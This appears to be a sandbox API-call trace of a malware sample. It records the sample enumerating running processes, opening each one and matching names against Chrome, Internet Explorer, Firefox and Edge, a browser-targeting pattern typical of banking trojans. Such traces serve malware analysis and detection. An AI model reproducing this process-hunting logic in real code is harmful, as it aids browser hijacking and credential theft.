	[0216.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.698] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.699] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.699] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.700] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0216.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4924
	[0216.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.702] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0216.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.702] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.702] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0216.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.703] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.703] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4928
	[0216.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.704] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.704] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.704] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.704] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0216.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x492c
	[0216.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.705] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0216.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.706] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.706] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0216.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.706] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0216.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4930
	[0216.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.707] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0216.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.708] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.708] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0216.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.708] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0216.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4934
	[0216.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.710] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0216.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.710] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.710] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0216.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.710] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0216.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4938
	[0216.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.712] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.712] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.712] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.713] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x493c
	[0216.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.714] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.714] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.715] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.715] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4940
	[0216.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.716] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.717] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4944
	[0216.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.718] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.719] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.719] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4948
	[0216.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.721] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x494c
	[0216.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.723] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4950
	[0216.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.724] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.724] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.724] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.725] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4954
	[0216.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0216.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4958
	[0216.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.728] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0216.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.728] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.728] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0216.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.729] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x495c
	[0216.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.730] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.730] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.730] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.731] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0216.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4960
	[0216.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.732] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.733] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.733] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.733] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.734] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4964
	[0216.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.734] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.735] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.735] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.735] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4968
	[0216.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.736] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.737] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.737] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.737] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0216.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x496c
	[0216.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.738] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0216.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.739] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.739] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0216.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.739] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0216.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4970
	[0216.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.740] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0216.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.741] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.741] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0216.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.741] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0216.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4974
	[0216.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.742] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.743] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.743] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.743] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0216.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4978
	[0216.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.744] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0216.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.744] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.745] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0216.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.745] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0216.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0216.746] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0216.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x497c
	[0216.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.747] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0216.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.748] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.748] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0216.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.749] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0216.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4980
	[0216.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.750] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0216.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.750] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.751] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0216.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.751] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
